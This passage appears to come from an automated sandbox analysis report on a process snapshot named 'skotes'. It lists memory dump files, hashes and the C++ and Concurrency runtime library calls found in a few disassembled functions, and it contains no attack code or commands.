                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1256429809-0
                                                                                                                                                                                                                                                  • Opcode ID: 0fe07ac36279be14936c387e78b23d722d97908927f12d1634eb63d0cf41ccd9
                                                                                                                                                                                                                                                  • Instruction ID: 9c6c6180eb818b241cece673ee3f8c78ac3d3451601130bc575a7274603c5e8c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe07ac36279be14936c387e78b23d722d97908927f12d1634eb63d0cf41ccd9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E671CF70900249AFDF15CF58CA80BBF7BB5AF66304F04409AEC416B352C7B99D16EB65
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00492876
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004928DF
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00492913
                                                                                                                                                                                                                                                    • Part of subcall function 004907ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0049080D
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00492993
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004929DB
                                                                                                                                                                                                                                                    • Part of subcall function 004907C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004907DE
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004929EF
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00492A00
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00492A4D
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00492A7E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1321587334-0
                                                                                                                                                                                                                                                  • Opcode ID: 12e6e06f1f0a055e68399a8ac667ce2464b8e5807ab875c8aab2c8392d3b3bfc
                                                                                                                                                                                                                                                  • Instruction ID: 0f0fdfc998e3eeaf1f603c78ee9785ba4c562b9425128092f4585d8e27eac263
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12e6e06f1f0a055e68399a8ac667ce2464b8e5807ab875c8aab2c8392d3b3bfc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E81CE72A01616AFCF18DFA9EA9096EBFB1BB48314B14403FD445A3351DB786D41CB9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00496A1F
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00496A51
                                                                                                                                                                                                                                                  • List.LIBCONCRT ref: 00496A8C
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00496A9D
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00496AB9
                                                                                                                                                                                                                                                  • List.LIBCONCRT ref: 00496AF4
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00496B05
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00496B20
                                                                                                                                                                                                                                                  • List.LIBCONCRT ref: 00496B5B
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00496B68
                                                                                                                                                                                                                                                    • Part of subcall function 00495EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00495EF7
                                                                                                                                                                                                                                                    • Part of subcall function 00495EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00495F09
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3403738998-0
                                                                                                                                                                                                                                                  • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                  • Instruction ID: f5023cacd5944e404b97f14eeedc00ca22dca9adbb0bc28980cd8e4e053bc7f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C516F70A00219ABDF04DF65C495FEEB7A8BF08344F15447EE905AB381DB38AE05CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 004A53A0
                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 004A53C7
                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 004A54D3
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 004A55AE
                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 004A5650
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
